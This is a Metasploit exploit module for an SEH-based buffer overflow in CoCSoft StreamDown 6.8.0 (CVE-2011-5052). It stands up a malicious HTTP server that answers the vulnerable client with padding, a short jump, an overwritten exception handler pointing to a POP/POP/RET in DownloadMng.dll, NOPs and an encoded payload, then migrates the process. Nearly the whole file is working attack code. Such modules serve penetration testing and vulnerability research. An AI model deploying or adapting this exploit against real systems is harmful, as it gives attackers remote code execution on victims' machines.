metasploit-framework/modules/exploits/windows/misc/stream_down_bof.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CoCSoft StreamDown 6.8.0 Buffer Overflow',
      'Description'    => %q{
        Stream Down 6.8.0 seh based buffer overflow triggered when processing
        the server reponse packet.During the overflow a structured exception
        handler is overwritten.
      },
      'Author'         => 'Fady Mohamed Osman <fady.mohamed.osman[at]gmail.com>',
      'References'	 =>
        [
          ['CVE', '2011-5052'],
          ['OSVDB', '78043'],
          ['BID', '51190'],
          ['URL', 'http://www.dark-masters.tk/'],
          ['URL', 'http://secunia.com/advisories/47343/'],
          ['EDB', '18283']
        ],
      'Privileged'     => false,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Payload'        =>
        {
          'BadChars' => "\x00\xff\x0a"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'StreamDown 6.8.0',
            {
              'Offset' => 16388,
              'Ret'    => 0x10019448 #POP/POP/RET in DownloadMng.dll
            }
          ],
        ],
        'DisclosureDate' => 'Dec 27 2011', # as an actual security bug
        'DefaultTarget' => 0,
      'License'       => MSF_LICENSE
    ))
  end

  def on_request_uri(cli,request)
    vprint_status("Requested: #{request.uri}")

    # No point to continue if the client isn't what we interested in
    ua = request.headers['User-Agent']
    if ua !~ /CoCSoft Stream Download/i
      print_error("Target not supported: #{ua}")
      send_not_found(cli)
      return
    end

    nseh = "\xeb\x06" + rand_text_alpha(2)
    seh = [target.ret].pack('V')
    offset_to_nseh = target['Offset']
    nops = make_nops(10)
    sploit = rand_text_alpha(offset_to_nseh) + nseh + seh + nops + payload.encoded
    cli.put(sploit)
    close_client(cli)
  end
end